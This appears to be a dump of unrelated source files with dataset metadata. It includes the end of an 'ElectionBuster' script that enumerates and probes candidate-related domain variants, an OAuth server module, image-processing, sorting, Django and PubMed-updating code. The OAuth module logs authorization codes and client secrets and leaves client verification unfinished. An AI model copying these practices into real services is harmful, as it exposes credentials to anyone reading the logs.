alt_alphabets) #### LOOP 1 #### # All examples use the input of 'josh franklin 2014 president DC' ################# #http://www.joshfranklin.com #http://www.josh2014.com #http://www.franklin2014.com #http://www.joshfranklin2014.com #http://www.joshfranklinforDC.com #http://www.joshfranklinDC.com #http://www.joshforpresident.com #http://www.josh4president.com #http://www.joshforpresident2014.com #http://www.josh4president2014.com #http://www.presidentjoshfranklin.com #http://www.president-josh-franklin.com #http://www.presidentjoshforpresident2014.com #http://www.presidentjosh4president2014.com #http://www.presidentjoshfranklinforpresident2014.com #http://www.presidentjosh-franklinforpresident2014.com #http://www.presidentjoshfranklin4president2014.com #http://www.presidentjosh-franklin4president2014.com def tryURL(url): url = stringAndStrip(url) for domain_name in tlds: print('Trying: ' + url + domain_name) allURLS.append(url + domain_name) print("Entering template loop 1^^^^^^^^^^^^^^^^^^^^^^^^^^" ) print(time.time() - start_time, "seconds") for r in results: tryURL( 'http://www.' + r , ) ### LOOP 2 ### # Puts donate at the beginning & # Removes the period after 'www' ##############tlds a little tlds.append( '.republican' ) tlds.append( '.democrat' ) tlds.append( '.red' ) tlds.append( '.blue' ) tlds.append( '.vote' ) #These next few look for some of the larger parties tryURL( 'http://www.republican' + fName + lName ) tryURL( 'http://www.democrat' + fName + lName ) tryURL( 'http://www.libertarian' + fName + lName ) tryURL( 'http://www.independent' + fName + lName ) tryURL( 'http://www.vote' + fName + lName ) #Example: votejoshfranklin.com tryURL( 'http://www.vote' + fName + middleInitial + lName ) #Example: votejoshmichaelfranklin.com tryURL( 'http://www.vote' + fName ) #Example: votejosh.com tryURL( 'http://www.vote' + lName ) #Example: votefranklin.com tryURL( 'http://www.' + lName + position ) #Example: franklinpresident.com tryURL( 'http://www.' + lName + altPosition ) #Example: franklinprez.com tryURL( 'http://www.real' + fName + lName ) #Example: realjoshfranklin.com for stateAlias in state: tryURL( 'http://www.' + lName + 'for' + stateAlias ) #Example: franklinforDC.com tryURL( 'http://www.' + lName + '4' + stateAlias ) #Example: franklin4DC.com tryURL( 'http://www.friendsof' + fName ) #Example: friendsofjosh.com tryURL( 'http://www.friendsof' + lName ) #Example: friendsofjosh.com tryURL( 'http://www.' + fName + 'sucks' ) #Example: joshsucks.com tryURL( 'http://www.' + lName + 'sucks' ) #Example: franklinsucks.com tryURL( 'http://www.' + fName ) #Example: josh.vote tryURL( 'http://www.' + lName ) #Example: franklin.vote tryURL( 'http://www.' + fName + lName ) #Example: joshfranklin.vote tryURL( 'http://www.elect' + fName + lName ) tryURL( 'http://www.elect' + fName + middleInitial + lName ) tryURL( 'http://www.elect' + fName ) tryURL( 'http://www.elect' + lName ) tryURL( 'http://www.' + fName + middleInitial + year ) tryURL( 'http://www.' + middleInitial + lName ) print( ' Total URLS: ' + str(len(allURLS)) + "\n" ) allURLS = removeDups( allURLS ) print( 'Unique URLS: ' + str(len(allURLS)) + "\n" ) pool = ThreadPool( 24 ) # Open the urls in their own threads # and return the results results = pool.map( tryURLforReal, allURLS ) pool.close() pool.join() #print(results) # Each thread added an entry for each result (found or not, gotta filter the blanks) # I'm doing this here sinced the file writes might not have been synchronized # its just a fear I had for i in results: resultsFile.write( i ) totalRuntime = time.time() - start_time, "seconds" ###### Write final results to logfile ########### resultsFile.write( "######################################" + "\n" ) resultsFile.write( "ElectionBuster Scan Results: " + "\n" ) resultsFile.write( "######################################" + "\n" ) resultsFile.write( "INPUTS = " + str(fName) + ", " + str(mName) + ", " + str(lName) + ", " + str(year) + ", " + str(position) + ", " + str(altPosition) + ", " + str(stateText) + ", " + str(party) + "\n" ) resultsFile.write( "Total runtime was " + str(totalRuntime) + "\n" ) resultsFile.write( "There were " + str(len(confirmedURLs)) + " positive results." + "\n" ) resultsFile.write( "There were " + str(len(testedURLs)) + " unique URLs tested." + "\n" ) resultsFile.write( "-------------------------------------" + "\n" ) resultsFile.write( "Positive results: " + "\n" ) resultsFile.write( "-------------------------------------" + "\n" ) for url in confirmedURLs: resultsFile.write( str(url) + "\n" ) resultsFile.write( "\n" ) resultsFile.write( "-------------------------------------" + "\n" ) resultsFile.write( "EOF " + "\n" ) #for url in allURLS: # resultsFile.write( str(url) + "\n" ) # print( str( url ) + "\n" ) ###### Print final results to screen ########### print( "###################################### " + "\n" ) print( "ElectionBuster Scan Results: " + "\n" ) print( "###################################### " + "\n" ) print( "INPUTS" + "\n" ) print( "First name: " + fName + "\n" ) print( "Middle name: " + mName + "\n" ) print( "Last name: " + lName + "\n" ) print( "Year: " + year + "\n" ) print( "Election type: " + electionType + "\n" ) print( "-------------------------------------" + "\n" ) print( "Total runtime was " + str(totalRuntime) + "\n" ) print( "-------------------------------------" + "\n" ) print( "Positive results: " + "\n" ) print( "There were " + str(len(confirmedURLs)) + " hits:" + "\n" ) print( "-------------------------------------" + "\n" ) print( "\n" ) for url in confirmedURLs: print( url ) print( "\n" ) # Bad things happen if these files are not properly closed resultsFile.close()
35.568
204
0.647623
1,632
13,338
5.273897
0.262868
0.053677
0.040781
0.03137
0.237597
0.141745
0.090508
0.073312
0.073312
0.073312
0
0.008181
0.15692
13,338
374
205
35.663102
0.757225
0.276578
0
0.191304
0
0
0.237795
0.042837
0
0
0
0.002674
0
1
0.017391
false
0
0.06087
0
0.095652
0.2
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99bc54e60d9317663e39e91ec8fe0cf6bc80d209
20,227
py
Python
core/authentication/__init__.py
Sick-codes/core
da9250f27a5de4fc3a08e9c47064b19f484b042b
[ "Apache-2.0" ]
null
null
null
core/authentication/__init__.py
Sick-codes/core
da9250f27a5de4fc3a08e9c47064b19f484b042b
[ "Apache-2.0" ]
null
null
null
core/authentication/__init__.py
Sick-codes/core
da9250f27a5de4fc3a08e9c47064b19f484b042b
[ "Apache-2.0" ]
null
null
null
"""Initialization of authentication.""" import json import logging import secrets import uuid from typing import TYPE_CHECKING, List, Optional if TYPE_CHECKING: from core.core import ApplicationCore import aiohttp_jinja2 from aiohttp import hdrs, web from ..const import CONF_TOKEN_LIFETIME from .auth_client import AuthenticationClient from .auth_database import AuthDatabase _LOGGER = logging.getLogger(__name__) logging.basicConfig(level=logging.DEBUG) class Authentication: # list of registered auth clients auth_clients: List[AuthenticationClient] = [] def __init__( self, core: "ApplicationCore", application: web.Application, auth_database: AuthDatabase, ): self.core = core self.app = application self.authorization = self.core.authorization self.auth_database = auth_database # Authorization Endpoint: obtain an authorization grant self.app.router.add_get( path="/oauth/authorize", handler=self.authorization_endpoint_get ) self.app.router.add_post( path="/oauth/authorize", handler=self.authorization_endpoint_post ) # Token Endpoint: obtain an access token by authorization grant or refresh token self.app.router.add_post( path="/oauth/token", handler=self.token_endpoint_handler ) self.app.router.add_post("/revoke", self.revoke_token_handler, name="revoke") self.app.router.add_get("/protected", self.protected_handler, name="protected") def add_client(self, auth_client: AuthenticationClient): self.auth_clients.append(auth_client) async def revoke_token_handler(self, request: web.Request) -> web.StreamResponse: """ Revoke the request token and all associated access tokens [RFC 7009] See Section 2.1: https://tools.ietf.org/html/rfc7009#section-2.1 """ _LOGGER.info("POST /revoke") await self.check_authorized(request) data = await request.post() token_to_revoke = data["token"] await self.auth_database.revoke_token(token_to_revoke) return web.Response(status=200) async def protected_handler(self, request: web.Request) -> web.StreamResponse: _LOGGER.warning("GET /protected") await self.check_permission(request, "library:read") response = web.Response(body=b"You are on protected page") return response @aiohttp_jinja2.template("authorize.jinja2") async def authorization_endpoint_get( self, request: web.Request ) -> web.StreamResponse: """ Validate the request to ensure that all required parameters are present and valid. See Section 4.1.1: https://tools.ietf.org/html/rfc6749#section-4.1.1 """ try: _LOGGER.debug(f"GET /oauth/authorize from: {request.host}") response_type = request.query.get("response_type") client_id = request.query.get("client_id") # validate required params if response_type is None or client_id is None: _LOGGER.warning("The response is missing a response_type or client_id.") data = """{ "error": "invalid_request", "error_description": "The request is missing a required parameter" }""" return web.json_response(json.loads(data)) # check if client is known if not any(client.client_id == client_id for client in self.auth_clients): _LOGGER.warning("The client_id is unknown!") data = """{ "error":"unauthorized_client", "error_description":"The client is not authorized to request an authorization code using this method." }""" return web.json_response(json.loads(data)) # validate response_type if response_type != "code": _LOGGER.warning( f"The request is using an invalid response_type: {response_type}" ) data = """{ "error":"unsupported_response_type", "error_description":"The request is using an invalid response_type" }""" return web.json_response(json.loads(data)) redirect_uri = request.query.get("redirect_uri") # extract client from registered auth_clients with matching client_id registered_auth_client = next( filter(lambda client: client.client_id == client_id, self.auth_clients), None, ) # validate if redirect_uri is in registered_auth_client if not any( uri == redirect_uri for uri in registered_auth_client.redirect_uris ): _LOGGER.error(f"redirect uri not found: {redirect_uri}") data = """{ "error":"unauthorized_client", "error_description":"The redirect_uri is unknown" }""" return web.json_response(json.loads(data)) scope = request.query.get("scope") requested_scopes = scope.split(" ") # TODO: validate scopes with regex => 1*( %x21 / %x23-5B / %x5D-7E )) registered_scopes = [ "openid", "profile", "email", "phone", "library:read", "library:append", "library:edit", "library:write", "library:share", "admin.users:read", "admin.users:invite", "admin.users:write", ] _LOGGER.debug( f"found {len(registered_scopes)} registered scopes and {len(requested_scopes)} requested scopes." ) # check if the requested scope is registered for requested_scope in requested_scopes: if requested_scope not in registered_scopes: _LOGGER.error( f"The requested scope '{requested_scope}' is invalid, unknown, or malformed." ) data = """{ "error":"invalid_scope", "error_description":"The requested scope is invalid, unknown, or malformed." }""" return web.json_response(json.loads(data)) # persist state to preventing cross-site request forgery [Section 10.12](https://tools.ietf.org/html/rfc6749#section-10.12) # state = request.query.get("state") # TODO: add scopes & localized descriptions only for requested scopes return { "requesting_app": registered_auth_client.client_name, "permissions": [ { "scope": "openid", "localized": "access the users public profile e.g.: username", }, { "scope": "profile", "localized": "access the users personal profile information e.g.: firstname, lastname", }, { "scope": "email", "localized": "access the users associated email address.", }, { "scope": "phone", "localized": "access the users associated phone number.", }, # { # "scope": "library.read", # "localized": "Read only Grant the user to list all photos owned by the user.", # }, # { # "scope": "library.append", # "localized": "Limited write access Grant the user to add new photos, create new albums.", # }, # { # "scope": "library.edit", # "localized": "Grant the user to edit photos owned by the user.", # }, { "scope": "library.write", "localized": "Grant the user to add and edit photos, albums, tags.", }, # { # "scope": "library.share", # "localized": "Grant the user to create new shares (photos/videos/albums).", # }, # { # "scope": "admin.users:read", # "localized": "Grant the user to list users on the system.", # }, # { # "scope": "admin.users:invite", # "localized": "Grant the user to invite new users to the system.", # }, # { # "scope": "admin.users:write", # "localized": "Grant the user to manage users on the system.", # }, ], } except Exception as e: # This error code is needed because a 500 Internal Server # Error HTTP status code cannot be returned to the client via an HTTP redirect. _LOGGER.error(f"an unexpected error happened: {e}") data = """{ "error":"server_error", "error_description":"The authorization server encountered an unexpected condition that prevented it from fulfilling the request." }""" return web.json_response(json.loads(data)) async def authorization_endpoint_post( self, request: web.Request ) -> web.StreamResponse: """ Validate the resource owners credentials. """ _LOGGER.debug("POST /oauth/authorize") data = await request.post() redirect_uri = request.query["redirect_uri"] if "client_id" not in request.query: _LOGGER.warning("invalid form") raise web.HTTPFound(f"{redirect_uri}?error=unauthorized_client") client_id = request.query["client_id"] _LOGGER.debug(f"client_id {client_id}") state = None if "state" in request.query: state = request.query["state"] _LOGGER.debug(f"state {state}") # check if client is known if not any(client.client_id == client_id for client in self.auth_clients): _LOGGER.warning(f"unknown client_id {client_id}") if state is not None: raise web.HTTPFound( f"{redirect_uri}?error=unauthorized_client&state={state}" ) else: raise web.HTTPFound(f"{redirect_uri}?error=unauthorized_client") # extract client from registered auth_clients with matching client_id registered_auth_client = next( filter(lambda client: client.client_id == client_id, self.auth_clients), None, ) # validate if redirect_uri is in registered_auth_client if not any(uri == redirect_uri for uri in registered_auth_client.redirect_uris): _LOGGER.error(f"invalid redirect_uri {redirect_uri}") if state is not None: raise web.HTTPFound( f"{redirect_uri}?error=unauthorized_client&state={state}" ) else: raise web.HTTPFound(f"{redirect_uri}?error=unauthorized_client") email = data["email"].strip(" ").lower() password = data["password"] # validate credentials credentials_are_valid = await self.auth_database.check_credentials( email, password ) if credentials_are_valid: # create an authorization code authorization_code = self.auth_database.create_authorization_code( email, client_id, request.remote ) _LOGGER.debug(f"authorization_code: {authorization_code}") if authorization_code is None: _LOGGER.warning("could not create auth code for client!") error_reason = "access_denied" if state is not None: raise web.HTTPFound( f"{redirect_uri}?error={error_reason}&state={state}" ) else: raise web.HTTPFound(f"{redirect_uri}?error={error_reason}") if state is not None: _LOGGER.debug( f"HTTPFound: {redirect_uri}?code={authorization_code}&state={state}" ) redirect_response = web.HTTPFound( f"{redirect_uri}?code={authorization_code}&state={state}" ) else: _LOGGER.debug(f"HTTPFound: {redirect_uri}?code={authorization_code}") redirect_response = web.HTTPFound( f"{redirect_uri}?code={authorization_code}" ) raise redirect_response else: error_reason = "access_denied" _LOGGER.warning(f"redirect with error {error_reason}") if state is not None: raise web.HTTPFound( f"{redirect_uri}?error={error_reason}&state={state}" ) else: raise web.HTTPFound(f"{redirect_uri}?error={error_reason}") async def token_endpoint_handler(self, request: web.Request) -> web.StreamResponse: """ Access Token: https://tools.ietf.org/html/rfc6749#section-4.1.3 Refresh Token: https://tools.ietf.org/html/rfc6749#section-6 """ _LOGGER.debug("POST /oauth/token") data = await request.post() # grant_type is REQUIRED if "grant_type" not in data: _LOGGER.warning("no grant_type specified!") data = '{"error":"invalid_request"}' return web.json_response(json.loads(data)) grant_type = data["grant_type"] # switch flow based on grant_type if grant_type == "authorization_code": return await self._handle_authorization_code_request(data) elif grant_type == "refresh_token": return await self._handle_refresh_token_request(request, data) else: _LOGGER.warning(f"invalid grant_type! {grant_type}") data = '{"error":"invalid_request"}' return web.json_response(json.loads(data)) async def _handle_authorization_code_request(self, data) -> web.StreamResponse: """ See Section 4.1.3: https://tools.ietf.org/html/rfc6749#section-4.1.3 """ # grant_type already checked # code is REQUIRED if "code" not in data: _LOGGER.warning("code param not provided!") data = {"error": "invalid_request"} return web.json_response(status=400, data=data) code = data["code"] # redirect_uri is REQUIRED if "redirect_uri" not in data: _LOGGER.warning("redirect_uri param not provided!") data = {"error": "invalid_request"} return web.json_response(status=400, data=data) redirect_uri = data["redirect_uri"] # TODO: compare redirect_uri with previous call _LOGGER.debug(f"TODO: compare redirect_uri {redirect_uri}") # client_id is REQUIRED if "client_id" not in data: data = {"error": "invalid_request"} return web.json_response(status=400, data=data) client_id = data["client_id"] client_code_valid = await self.auth_database.validate_authorization_code( code, client_id ) if not client_code_valid: _LOGGER.error("authorization_code invalid!") payload = {"error": "invalid_grant"} return web.json_response(status=400, data=payload) access_token, refresh_token = await self.auth_database.create_tokens( code, client_id ) payload = { "access_token": access_token, "token_type": "Bearer", "expires_in": CONF_TOKEN_LIFETIME, "refresh_token": refresh_token, } return web.json_response(status=200, data=payload) async def _handle_refresh_token_request( self, request: web.Request, data ) -> web.StreamResponse: """ See Section 6: https://tools.ietf.org/html/rfc6749#section-6 """ # code is REQUIRED if "refresh_token" not in data: _LOGGER.warning("refresh token not provided!") data = {"error": "invalid_request"} return web.json_response(data) refresh_token = data["refresh_token"] # check if client_id and client_secret are provided as request parameters or HTTP Basic auth header if "client_id" in data and "client_secret" in data: # handle request parameters client_id = data["client_id"] client_secret = data["client_secret"] elif hdrs.AUTHORIZATION in request.headers: # handle basic headers auth_type, auth_val = request.headers.get(hdrs.AUTHORIZATION).split(" ", 1) if auth_type != "Basic": return False # TODO: split auth_val in client_id and client_secret _LOGGER.error(f"split token into client_id and client_secret: {auth_val}") client_id = "" client_secret = "" registered_auth_client = next( filter(lambda client: client.client_id == client_id, self.auth_clients), None, ) _LOGGER.debug(f"client_id: {client_id}, {registered_auth_client}") if not registered_auth_client.client_secret == client_secret: _LOGGER.error("client_id does not match with client_secret") data = {"error": "invalid_client"} return web.json_response(data) access_token, refresh_token = await self.auth_database.renew_tokens( client_id, refresh_token ) if access_token is None: raise web.HTTPForbidden() payload = { "access_token": access_token, "token_type": "Bearer", "expires_in": CONF_TOKEN_LIFETIME, "refresh_token": refresh_token, } return web.json_response(payload) def create_client(self): """Generate a client_id and client_secret to add new clients.""" client_id = uuid.uuid4() client_secret = secrets.token_urlsafe(16) _LOGGER.info(f"generated client_id: {client_id}") _LOGGER.info(f"generated client_secret: {client_secret}") async def check_authorized(self, request: web.Request) -> Optional[str]: """Check if authorization header and returns user ID if valid""" if hdrs.AUTHORIZATION in request.headers: try: auth_type, auth_val = request.headers.get(hdrs.AUTHORIZATION).split( " ", 1 ) if not await self.auth_database.validate_access_token(auth_val): raise web.HTTPForbidden() return await self.auth_database.user_id_for_token(auth_val) except ValueError: # If no space in authorization header _LOGGER.debug("invalid authorization header!") raise web.HTTPForbidden() else: _LOGGER.debug("missing authorization header!") raise web.HTTPForbidden() async def check_permission(self, request: web.Request, scope: str) -> None: """Check if given authorization header is valid and user has granted access to given scope.""" # check if user is authorized await self.check_authorized(request) # check if required scope is granted await self.core.authorization.check_scope(scope)
39.738703
145
0.565531
2,117
20,227
5.217761
0.135097
0.033315
0.01883
0.030418
0.440703
0.345012
0.333152
0.257378
0.223339
0.205685
0
0.00743
0.341277
20,227
508
146
39.816929
0.8216
0.118999
0
0.319767
0
0
0.242739
0.05773
0
0
0
0.005906
0
1
0.008721
false
0.005814
0.031977
0
0.113372
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99bc74d2f622c7d0048f1d7a1244333cdfa0d30a
785
py
Python
Utils/Image_processing.py
philshams/FC_analysis
cabe2385d5061d206a21b230605bfce9e39ec7f2
[ "MIT" ]
null
null
null
Utils/Image_processing.py
philshams/FC_analysis
cabe2385d5061d206a21b230605bfce9e39ec7f2
[ "MIT" ]
null
null
null
Utils/Image_processing.py
philshams/FC_analysis
cabe2385d5061d206a21b230605bfce9e39ec7f2
[ "MIT" ]
null
null
null
import cv2 def process_background(background, track_options): """ extract background: first frame of first video of a session Allow user to specify ROIs on the background image """ print(' ... extracting background') cv2.startWindowThread() if len(background.shape) == 3: gray = cv2.cvtColor(background, cv2.COLOR_BGR2GRAY) else: gray = background blur = cv2.blur(gray, (15, 15)) edges = cv2.Canny(blur, 25, 30) rois = {'Shelter': None, 'Threat': None, 'Task': None} if track_options['bg get rois']: # Get user to define Shelter ROI for rname in rois.keys(): print('\n\nPlease mark {}'.format(rname)) rois[rname] = cv2.selectROI(gray, fromCenter=False) return edges, rois
29.074074
78
0.628025
99
785
4.939394
0.606061
0.04908
0
0
0
0
0
0
0
0
0
0.02901
0.253503
785
26
79
30.192308
0.805461
0.182166
0
0
0
0
0.120827
0
0
0
0
0
0
1
0.0625
false
0
0.0625
0
0.1875
0.125
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99bcdcd5e66866adeb754619341836bf5daa27c7
1,553
py
Python
python/ctci-merge-sort.py
gajubadge11/hackerrank-3
132a5019b7ed21507bb95b5063fa66c446b0eff7
[ "MIT" ]
21
2015-02-09T18:08:38.000Z
2021-11-08T15:00:48.000Z
python/ctci-merge-sort.py
gajubadge11/hackerrank-3
132a5019b7ed21507bb95b5063fa66c446b0eff7
[ "MIT" ]
7
2020-04-12T23:00:19.000Z
2021-01-30T23:44:24.000Z
python/ctci-merge-sort.py
gajubadge11/hackerrank-3
132a5019b7ed21507bb95b5063fa66c446b0eff7
[ "MIT" ]
27
2015-07-22T18:08:12.000Z
2022-02-28T19:50:26.000Z
#!/bin/python3 import math import os import random import re import sys # This solution times out on Hackerrank with Python 3 # However, it passes all test cases with Pypy 3 def countInversions(arr): global COUNT_INVERSIONS COUNT_INVERSIONS = 0 mergeSort(arr) return COUNT_INVERSIONS def mergeSort(arr): if (len(arr) <= 1): return arr # Split the array in two # Recursively sort both halves middle = len(arr) // 2 arrLeft = mergeSort(arr[:middle]) arrRight = mergeSort(arr[middle:]) # Merge the two halves mergedArray = [] leftIndex = 0 rightIndex = 0 global COUNT_INVERSIONS # Iterate through both lists and append the smaller element while(leftIndex < len(arrLeft) and rightIndex < len(arrRight)): if(arrLeft[leftIndex] <= arrRight[rightIndex]): mergedArray.append(arrLeft[leftIndex]) leftIndex += 1 else: mergedArray.append(arrRight[rightIndex]) rightIndex += 1 COUNT_INVERSIONS += len(arrLeft) - leftIndex # Append any left over elements mergedArray.extend(arrLeft[leftIndex:]) mergedArray.extend(arrRight[rightIndex:]) return mergedArray if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') num_test_cases = int(input()) for _test_case in range(num_test_cases): _ = int(input()) arr = list(map(int, input().rstrip().split())) result = countInversions(arr) fptr.write(str(result) + '\n') fptr.close()
24.650794
67
0.647135
183
1,553
5.377049
0.486339
0.07622
0.042683
0.030488
0.04065
0
0
0
0
0
0
0.008598
0.251127
1,553
62
68
25.048387
0.837489
0.175145
0
0.05
0
0
0.017282
0
0
0
0
0
0
1
0.05
false
0
0.125
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99bd70b0b1f3c2fefc5fbd3c5e4dfb7838ccf414
447
py
Python
blogapp/models.py
FnK-Lap/Unchained
3a78d0597ab34737fdcc6d347c87063e93fad9cf
[ "MIT" ]
null
null
null
blogapp/models.py
FnK-Lap/Unchained
3a78d0597ab34737fdcc6d347c87063e93fad9cf
[ "MIT" ]
null
null
null
blogapp/models.py
FnK-Lap/Unchained
3a78d0597ab34737fdcc6d347c87063e93fad9cf
[ "MIT" ]
null
null
null
from django.db import models # Create your models here. class Post(models.Model): content = models.TextField() created_at = models.DateTimeField() def __str__(self): return self.content class Comment(models.Model): comment = models.CharField(max_length=200) created_at = models.DateTimeField() post = models.ForeignKey(Post, on_delete=models.CASCADE) def __str__(self): return self.comment
29.8
66
0.693512
54
447
5.518519
0.537037
0.067114
0.100671
0.187919
0.134228
0
0
0
0
0
0
0.008499
0.210291
447
15
67
29.8
0.835694
0.053691
0
0.333333
0
0
0
0
0
0
0
0
0
1
0.166667
false
0
0.083333
0.166667
1
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
1
0
0
3
99be8e0ad90bd5d8dfd03aaa447d0efe4fc69820
267
py
Python
FusionIIIT/applications/gymkhana/migrations/0014_merge_20200606_1238.py
sabhishekpratap5/sonarcubeTest2
9bd8105e457f6feb8c38fa94b335e54783fca99e
[ "bzip2-1.0.6" ]
2
2020-06-17T11:59:08.000Z
2020-07-10T12:17:35.000Z
FusionIIIT/applications/gymkhana/migrations/0014_merge_20200606_1238.py
sabhishekpratap5/sonarcubeTest2
9bd8105e457f6feb8c38fa94b335e54783fca99e
[ "bzip2-1.0.6" ]
19
2019-09-08T06:01:14.000Z
2020-05-21T09:08:20.000Z
FusionIIIT/applications/gymkhana/migrations/0014_merge_20200606_1238.py
sabhishekpratap5/sonarcubeTest2
9bd8105e457f6feb8c38fa94b335e54783fca99e
[ "bzip2-1.0.6" ]
14
2019-08-31T12:25:42.000Z
2022-01-12T08:05:33.000Z
# Generated by Django 3.0.6 on 2020-06-06 12:38 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('gymkhana', '0005_auto_20200605_0937'), ('gymkhana', '0013_event_info'), ] operations = [ ]
17.8
48
0.640449
32
267
5.1875
0.84375
0
0
0
0
0
0
0
0
0
0
0.171569
0.235955
267
14
49
19.071429
0.642157
0.168539
0
0
1
0
0.245455
0.104545
0
0
0
0
0
1
0
false
0
0.125
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
99bf91ac2f49e24944ae85032ce5745ad6b70267
21,009
py
Python
ENCODE_publications.py
T2DREAM/pyencoded-tools
75fa636995bfc9fe181f9af490ce70dde3f6ce21
[ "MIT" ]
null
null
null
ENCODE_publications.py
T2DREAM/pyencoded-tools
75fa636995bfc9fe181f9af490ce70dde3f6ce21
[ "MIT" ]
null
null
null
ENCODE_publications.py
T2DREAM/pyencoded-tools
75fa636995bfc9fe181f9af490ce70dde3f6ce21
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: latin-1 -*- from Bio import Entrez from Bio import Medline import argparse import os import csv import logging import encodedcc EPILOG = ''' Takes in a VERY specific file format to use for updating the publications Also can update the existing publications using the pubmed database An EMAIL is required to run this script This is for the Entrez database This is a dryrun default script This script requires the BioPython module Options: %(prog)s --consortium Consortium_file.txt This takes the consortium file %(prog)s --community Community_file.txt This takes the community file %(prog)s --updateonly list.txt Takes file with single column of publication UUIDs, checks against PubMed \ to ensure data is correct and will update if needed ''' logger = logging.getLogger(__name__) def getArgs(): parser = argparse.ArgumentParser( description=__doc__, epilog=EPILOG, formatter_class=argparse.RawDescriptionHelpFormatter, ) parser.add_argument('--consortium', help="File with consortium publication information") parser.add_argument('--community', help="File with community publication information") parser.add_argument('--outfile', help="Output file name", default='publication_results.txt') parser.add_argument('--key', help="The keypair identifier from the keyfile.", default='default') parser.add_argument('--keyfile', help="The keyfile", default=os.path.expanduser('~/keypairs.json')) parser.add_argument('--debug', help="Debug prints out HTML requests and returned JSON \ objects. Default is off", action='store_true', default=False) parser.add_argument('--update', help="Run script and PATCH objects as needed. \ Default is off", action='store_true', default=False) parser.add_argument('--create', help="Run script and POST new objects as needed. \ Default is off", action='store_true', default=False) parser.add_argument('--createonly', help="Run script and POST new objects as needed,\ only look up as needed. Default is off", action='store_true', default=False) parser.add_argument('--updateonly', help="File containing publication UUIDS from ENCODE database for\ updating. If the publication does not have PMID the script will\ find it comparing based on title and assuming unique title") parser.add_argument('email', help="Email needed to make queries to Entrez process") args = parser.parse_args() if args.debug: logging.basicConfig(filename=args.outfile, filemode="w", format='%(levelname)s:%(message)s', level=logging.DEBUG) else: # use the default logging level logging.basicConfig(filename=args.outfile, filemode="w", format='%(levelname)s:%(message)s', level=logging.INFO) logging.getLogger("requests").setLevel(logging.WARNING) return args class PublicationUpdate: def __init__(self, arguments): self.MAPPING = {"abstract": "AB", "authors": "AU", "title": "TI", "volume": "VI", "journal": "JT", "date_published": "DP", "page": "PG", "issue": "IP"} self.entrezDict = {} self.PATCH_COUNT = 0 self.POST_COUNT = 0 args = arguments self.UPDATE = args.update self.CREATE = args.create or args.createonly self.CREATE_ONLY = args.createonly self.UPDATE_ONLY = args.updateonly self.community = args.community self.consortium = args.consortium if self.UPDATE: print("Will PATCH publication objects as needed") if self.CREATE: print("POST new pubmeds") def setup_publication(self): '''consortium publications file''' self.consortium_dict = {} with open(self.consortium, 'r', encoding='ISO-8859-1') as f: reader = csv.reader(f, delimiter='\t') for PMID, published_by, categories, catch1, code, catch2, title in reader: categories = categories.replace(";", ",").rstrip(" ") published_by = published_by.replace(";", ",").rstrip(" ") cat = [x.strip(' ').lower() for x in categories.rstrip(',').split(",")] pub = [x.strip(' ') for x in published_by.rstrip(',').split(",")] temp = {"published_by": pub, "categories": cat} self.consortium_dict[PMID] = temp self.consortium_ids = list(self.consortium_dict.keys()) '''community publications file''' self.community_dict = {} with open(self.community, 'r', encoding='ISO-8859-1') as f: reader = csv.reader(f, delimiter='\t') for PMID, published_by, categories, data_used, catch1, catch2, title, catch3, catch4, catch5, catch6, catch7, catch8, catch9, catch10, catch11, catch12, catch13, catch14, catch15, catch16, catch17, catch18 in reader: categories = categories.replace(";", ",").rstrip(" ") published_by = published_by.replace(";", ",").rstrip(" ") cat = [x.strip(' ').lower() for x in categories.rstrip(',').split(",")] pub = [x.strip(' ') for x in published_by.rstrip(',').split(",")] temp = {"published_by": pub, "categories": cat, "data_used": data_used} self.community_dict[PMID] = temp self.community_ids = list(self.community_dict.keys()) def get_entrez(self, idList): '''gets the values from Entrez ''' handle = Entrez.efetch(db="pubmed", id=idList, rettype="medline", retmode="text") # records is an iterator, so you can iterate through the records only once records = Medline.parse(handle) # save the records, you can convert them to a list records = list(records) for record in records: tempDict = {} for key in self.MAPPING.keys(): if key == "authors": auth = ", ".join(str(x) for x in record.get("AU", [])) tempDict["authors"] = auth else: tempDict[key] = record.get(self.MAPPING.get(key), "") self.entrezDict[record.get("PMID")] = tempDict def check_ENCODE(self, idList, connection, otherIdList=[], bothDicts={}): for pmid in idList: extraData = bothDicts.get(pmid) ENCODEvalue = encodedcc.get_ENCODE("/search/?type=publication&searchTerm=PMID:" + pmid, connection) if ENCODEvalue.get("@graph"): log = "PMID " + pmid + " is listed in ENCODE" logger.info('%s' % log) uuid = ENCODEvalue.get("@graph")[0].get("uuid") if not self.CREATE_ONLY: self.compare_entrez_ENCODE(uuid, pmid, connection, extraData) else: if self.CREATE_ONLY: self.get_entrez([pmid]) titleEntrez = self.entrezDict[pmid].get("title") found = False for otherID in otherIdList: titleENCODE = encodedcc.get_ENCODE("/search/?type=publication&searchTerm=" + otherID, connection) if titleENCODE.get("title") == titleEntrez: log = pmid + " is in ENCODE by a different name " + titleENCODE.get("uuid") logger.warning('%s' % log) self.compare_entrez_ENCODE(titleENCODE.get("uuid"), pmid, connection, extraData) if self.UPDATE: newIdent = titleENCODE.get("identifiers") newIdent.append("PMID:" + pmid) patch_dict = {"identifiers": newIdent} encodedcc.patch_ENCODE(titleENCODE.get("uuid"), connection, patch_dict) found = True if found is False: log = "This publication is not listed in ENCODE " + pmid logger.warning('%s' % log) if self.CREATE: self.POST_COUNT += 1 pmidData = self.entrezDict[pmid] log = "POSTing the new object: " + 